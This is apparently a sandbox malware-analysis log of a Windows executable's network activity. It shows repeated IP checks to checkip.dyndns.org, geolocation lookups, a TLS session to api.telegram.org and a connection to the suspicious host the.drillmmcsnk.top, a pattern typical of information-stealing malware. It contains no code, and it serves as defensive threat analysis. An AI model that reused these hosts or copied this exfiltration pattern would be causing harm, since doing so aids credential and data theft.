                                                                                                                                    Nov 26, 2024 09:47:13.465205908 CET49734443192.168.2.7104.21.67.152
                                                                                                                                    Nov 26, 2024 09:47:13.465801001 CET49734443192.168.2.7104.21.67.152
                                                                                                                                    Nov 26, 2024 09:47:13.470196009 CET4972680192.168.2.7132.226.8.169
                                                                                                                                    Nov 26, 2024 09:47:13.471334934 CET4974180192.168.2.7132.226.8.169
                                                                                                                                    Nov 26, 2024 09:47:13.592293024 CET8049726132.226.8.169192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:13.592360973 CET4972680192.168.2.7132.226.8.169
                                                                                                                                    Nov 26, 2024 09:47:13.593214035 CET8049741132.226.8.169192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:13.593307018 CET4974180192.168.2.7132.226.8.169
                                                                                                                                    Nov 26, 2024 09:47:13.593511105 CET4974180192.168.2.7132.226.8.169
                                                                                                                                    Nov 26, 2024 09:47:13.713481903 CET8049741132.226.8.169192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:15.113097906 CET8049741132.226.8.169192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:15.114972115 CET49742443192.168.2.7104.21.67.152
                                                                                                                                    Nov 26, 2024 09:47:15.115052938 CET44349742104.21.67.152192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:15.115186930 CET49742443192.168.2.7104.21.67.152
                                                                                                                                    Nov 26, 2024 09:47:15.115499020 CET49742443192.168.2.7104.21.67.152
                                                                                                                                    Nov 26, 2024 09:47:15.115513086 CET44349742104.21.67.152192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:15.165925980 CET4974180192.168.2.7132.226.8.169
                                                                                                                                    Nov 26, 2024 09:47:16.419857979 CET44349742104.21.67.152192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:16.428328991 CET49742443192.168.2.7104.21.67.152
                                                                                                                                    Nov 26, 2024 09:47:16.428378105 CET44349742104.21.67.152192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:16.884424925 CET44349742104.21.67.152192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:16.884505033 CET44349742104.21.67.152192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:16.884624958 CET49742443192.168.2.7104.21.67.152
                                                                                                                                    Nov 26, 2024 09:47:16.885469913 CET49742443192.168.2.7104.21.67.152
                                                                                                                                    Nov 26, 2024 09:47:16.896569014 CET4974180192.168.2.7132.226.8.169
                                                                                                                                    Nov 26, 2024 09:47:16.897921085 CET4974880192.168.2.7132.226.8.169
                                                                                                                                    Nov 26, 2024 09:47:17.019750118 CET8049741132.226.8.169192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:17.019777060 CET8049748132.226.8.169192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:17.019921064 CET4974180192.168.2.7132.226.8.169
                                                                                                                                    Nov 26, 2024 09:47:17.019979954 CET4974880192.168.2.7132.226.8.169
                                                                                                                                    Nov 26, 2024 09:47:17.050232887 CET4974880192.168.2.7132.226.8.169
                                                                                                                                    Nov 26, 2024 09:47:17.170406103 CET8049748132.226.8.169192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:18.539872885 CET8049748132.226.8.169192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:18.542330980 CET49754443192.168.2.7104.21.67.152
                                                                                                                                    Nov 26, 2024 09:47:18.542438984 CET44349754104.21.67.152192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:18.542553902 CET49754443192.168.2.7104.21.67.152
                                                                                                                                    Nov 26, 2024 09:47:18.542893887 CET49754443192.168.2.7104.21.67.152
                                                                                                                                    Nov 26, 2024 09:47:18.542929888 CET44349754104.21.67.152192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:18.587888002 CET4974880192.168.2.7132.226.8.169
                                                                                                                                    Nov 26, 2024 09:47:19.802077055 CET44349754104.21.67.152192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:19.820348978 CET49754443192.168.2.7104.21.67.152
                                                                                                                                    Nov 26, 2024 09:47:19.820380926 CET44349754104.21.67.152192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:20.265223026 CET44349754104.21.67.152192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:20.265320063 CET44349754104.21.67.152192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:20.265372992 CET49754443192.168.2.7104.21.67.152
                                                                                                                                    Nov 26, 2024 09:47:20.265878916 CET49754443192.168.2.7104.21.67.152
                                                                                                                                    Nov 26, 2024 09:47:20.268944979 CET4974880192.168.2.7132.226.8.169
                                                                                                                                    Nov 26, 2024 09:47:20.270000935 CET4976080192.168.2.7132.226.8.169
                                                                                                                                    Nov 26, 2024 09:47:20.390301943 CET8049748132.226.8.169192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:20.390389919 CET4974880192.168.2.7132.226.8.169
                                                                                                                                    Nov 26, 2024 09:47:20.391431093 CET8049760132.226.8.169192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:20.391508102 CET4976080192.168.2.7132.226.8.169
                                                                                                                                    Nov 26, 2024 09:47:20.391710997 CET4976080192.168.2.7132.226.8.169
                                                                                                                                    Nov 26, 2024 09:47:20.511706114 CET8049760132.226.8.169192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:21.848341942 CET8049760132.226.8.169192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:21.850975037 CET49761443192.168.2.7104.21.67.152
                                                                                                                                    Nov 26, 2024 09:47:21.851011038 CET44349761104.21.67.152192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:21.851171017 CET49761443192.168.2.7104.21.67.152
                                                                                                                                    Nov 26, 2024 09:47:21.851473093 CET49761443192.168.2.7104.21.67.152
                                                                                                                                    Nov 26, 2024 09:47:21.851485014 CET44349761104.21.67.152192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:21.900346041 CET4976080192.168.2.7132.226.8.169
                                                                                                                                    Nov 26, 2024 09:47:23.110855103 CET44349761104.21.67.152192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:23.112530947 CET49761443192.168.2.7104.21.67.152
                                                                                                                                    Nov 26, 2024 09:47:23.112555981 CET44349761104.21.67.152192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:23.570593119 CET44349761104.21.67.152192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:23.570657015 CET44349761104.21.67.152192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:23.570715904 CET49761443192.168.2.7104.21.67.152
                                                                                                                                    Nov 26, 2024 09:47:23.571186066 CET49761443192.168.2.7104.21.67.152
                                                                                                                                    Nov 26, 2024 09:47:23.623152018 CET4976080192.168.2.7132.226.8.169
                                                                                                                                    Nov 26, 2024 09:47:23.743645906 CET8049760132.226.8.169192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:23.747275114 CET4976080192.168.2.7132.226.8.169
                                                                                                                                    Nov 26, 2024 09:47:23.771730900 CET49767443192.168.2.7149.154.167.220
                                                                                                                                    Nov 26, 2024 09:47:23.771781921 CET44349767149.154.167.220192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:23.771857023 CET49767443192.168.2.7149.154.167.220
                                                                                                                                    Nov 26, 2024 09:47:23.772321939 CET49767443192.168.2.7149.154.167.220
                                                                                                                                    Nov 26, 2024 09:47:23.772334099 CET44349767149.154.167.220192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:25.140638113 CET44349767149.154.167.220192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:25.140804052 CET49767443192.168.2.7149.154.167.220
                                                                                                                                    Nov 26, 2024 09:47:25.143830061 CET49767443192.168.2.7149.154.167.220
                                                                                                                                    Nov 26, 2024 09:47:25.143860102 CET44349767149.154.167.220192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:25.144126892 CET44349767149.154.167.220192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:25.145662069 CET49767443192.168.2.7149.154.167.220
                                                                                                                                    Nov 26, 2024 09:47:25.191337109 CET44349767149.154.167.220192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:25.649388075 CET44349767149.154.167.220192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:25.649460077 CET44349767149.154.167.220192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:25.649522066 CET49767443192.168.2.7149.154.167.220
                                                                                                                                    Nov 26, 2024 09:47:25.654918909 CET49767443192.168.2.7149.154.167.220
                                                                                                                                    Nov 26, 2024 09:47:31.271353960 CET4970280192.168.2.7132.226.8.169
                                                                                                                                    Nov 26, 2024 09:47:31.953756094 CET4978680192.168.2.75.182.211.149
                                                                                                                                    Nov 26, 2024 09:47:32.073987961 CET80497865.182.211.149192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:32.074085951 CET4978680192.168.2.75.182.211.149
                                                                                                                                    Nov 26, 2024 09:47:32.074982882 CET4978680192.168.2.75.182.211.149
                                                                                                                                    Nov 26, 2024 09:47:32.080909967 CET4978680192.168.2.75.182.211.149
                                                                                                                                    Nov 26, 2024 09:47:32.194951057 CET80497865.182.211.149192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:32.200956106 CET80497865.182.211.149192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:32.200970888 CET80497865.182.211.149192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:33.427690983 CET80497865.182.211.149192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:33.481152058 CET4978680192.168.2.75.182.211.149
                                                                                                                                    Nov 26, 2024 09:47:38.349345922 CET80497865.182.211.149192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:38.349493980 CET4978680192.168.2.75.182.211.149
                                                                                                                                    Nov 26, 2024 09:49:03.572771072 CET4978680192.168.2.75.182.211.149
                                                                                                                                    Nov 26, 2024 09:49:03.932029009 CET4978680192.168.2.75.182.211.149
                                                                                                                                    Nov 26, 2024 09:49:04.635138988 CET4978680192.168.2.75.182.211.149
                                                                                                                                    Nov 26, 2024 09:49:05.838269949 CET4978680192.168.2.75.182.211.149
                                                                                                                                    Nov 26, 2024 09:49:08.322684050 CET4978680192.168.2.75.182.211.149
                                                                                                                                    Nov 26, 2024 09:49:13.135317087 CET4978680192.168.2.75.182.211.149
                                                                                                                                    Nov 26, 2024 09:49:22.822746038 CET4978680192.168.2.75.182.211.149

                                                                                                                                    UDP Packets

                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                    Nov 26, 2024 09:46:51.490933895 CET5160453192.168.2.71.1.1.1
                                                                                                                                    Nov 26, 2024 09:46:51.632587910 CET53516041.1.1.1192.168.2.7
                                                                                                                                    Nov 26, 2024 09:46:54.222032070 CET6366253192.168.2.71.1.1.1
                                                                                                                                    Nov 26, 2024 09:46:54.365021944 CET53636621.1.1.1192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:23.623055935 CET5826953192.168.2.71.1.1.1
                                                                                                                                    Nov 26, 2024 09:47:23.768070936 CET53582691.1.1.1192.168.2.7
                                                                                                                                    Nov 26, 2024 09:47:31.376580000 CET5943753192.168.2.71.1.1.1
                                                                                                                                    Nov 26, 2024 09:47:31.950150013 CET53594371.1.1.1192.168.2.7

                                                                                                                                    DNS Queries

                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                    Nov 26, 2024 09:46:51.490933895 CET192.168.2.71.1.1.10xebfStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                    Nov 26, 2024 09:46:54.222032070 CET192.168.2.71.1.1.10x54bcStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                                    Nov 26, 2024 09:47:23.623055935 CET192.168.2.71.1.1.10xfe9bStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                                    Nov 26, 2024 09:47:31.376580000 CET192.168.2.71.1.1.10xec13Standard query (0)the.drillmmcsnk.topA (IP address)IN (0x0001)false

                                                                                                                                    DNS Answers

                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                    Nov 26, 2024 09:46:51.632587910 CET1.1.1.1192.168.2.70xebfNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Nov 26, 2024 09:46:51.632587910 CET1.1.1.1192.168.2.70xebfNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                    Nov 26, 2024 09:46:51.632587910 CET1.1.1.1192.168.2.70xebfNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                    Nov 26, 2024 09:46:51.632587910 CET1.1.1.1192.168.2.70xebfNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                    Nov 26, 2024 09:46:51.632587910 CET1.1.1.1192.168.2.70xebfNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                    Nov 26, 2024 09:46:51.632587910 CET1.1.1.1192.168.2.70xebfNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                    Nov 26, 2024 09:46:54.365021944 CET1.1.1.1192.168.2.70x54bcNo error (0)reallyfreegeoip.org104.21.67.152A (IP address)IN (0x0001)false
                                                                                                                                    Nov 26, 2024 09:46:54.365021944 CET1.1.1.1192.168.2.70x54bcNo error (0)reallyfreegeoip.org172.67.177.134A (IP address)IN (0x0001)false
                                                                                                                                    Nov 26, 2024 09:47:23.768070936 CET1.1.1.1192.168.2.70xfe9bNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                                    Nov 26, 2024 09:47:31.950150013 CET1.1.1.1192.168.2.70xec13No error (0)the.drillmmcsnk.top5.182.211.149A (IP address)IN (0x0001)false

                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                    • reallyfreegeoip.org
                                                                                                                                    • api.telegram.org
                                                                                                                                    • checkip.dyndns.org
                                                                                                                                    • the.drillmmcsnk.top

                                                                                                                                    HTTP Packets

                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    0192.168.2.749699132.226.8.169806748C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Nov 26, 2024 09:46:51.767282009 CET151OUTGET / HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Nov 26, 2024 09:46:53.245064974 CET272INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 26 Nov 2024 08:46:52 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Content-Length: 103
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    Pragma: no-cache
                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
                                                                                                                                    Nov 26, 2024 09:46:53.253727913 CET127OUTGET / HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                    Nov 26, 2024 09:46:53.757086992 CET272INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 26 Nov 2024 08:46:53 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Content-Length: 103
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    Pragma: no-cache
                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
                                                                                                                                    Nov 26, 2024 09:46:56.230967999 CET127OUTGET / HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                    Nov 26, 2024 09:46:56.717119932 CET272INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 26 Nov 2024 08:46:56 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Content-Length: 103
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    Pragma: no-cache
                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    1192.168.2.749702132.226.8.169806748C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Nov 26, 2024 09:46:58.564237118 CET127OUTGET / HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                    Nov 26, 2024 09:47:00.052484035 CET272INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 26 Nov 2024 08:46:59 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Content-Length: 103
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    Pragma: no-cache
                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    2192.168.2.749705132.226.8.169806748C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Nov 26, 2024 09:47:01.948117971 CET151OUTGET / HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Nov 26, 2024 09:47:03.407274008 CET272INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 26 Nov 2024 08:47:03 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Content-Length: 103
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    Pragma: no-cache
                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    3192.168.2.749712132.226.8.169806748C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Nov 26, 2024 09:47:05.249593973 CET151OUTGET / HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Nov 26, 2024 09:47:07.355262041 CET272INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 26 Nov 2024 08:47:07 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Content-Length: 103
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    Pragma: no-cache
                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    4192.168.2.749726132.226.8.169806748C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Nov 26, 2024 09:47:09.192804098 CET151OUTGET / HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Nov 26, 2024 09:47:11.751053095 CET272INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 26 Nov 2024 08:47:11 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Content-Length: 103
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    Pragma: no-cache
                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    5192.168.2.749741132.226.8.169806748C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Nov 26, 2024 09:47:13.593511105 CET151OUTGET / HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Nov 26, 2024 09:47:15.113097906 CET272INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 26 Nov 2024 08:47:14 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Content-Length: 103
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    Pragma: no-cache
                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    6192.168.2.749748132.226.8.169806748C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Nov 26, 2024 09:47:17.050232887 CET151OUTGET / HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Nov 26, 2024 09:47:18.539872885 CET272INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 26 Nov 2024 08:47:18 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Content-Length: 103
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    Pragma: no-cache
                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    7192.168.2.749760132.226.8.169806748C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Nov 26, 2024 09:47:20.391710997 CET151OUTGET / HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Nov 26, 2024 09:47:21.848341942 CET272INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 26 Nov 2024 08:47:21 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Content-Length: 103
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    Pragma: no-cache
                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    8192.168.2.7497865.182.211.149806748C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe
                                                                                                                                    TimestampBytes transferredDirectionData
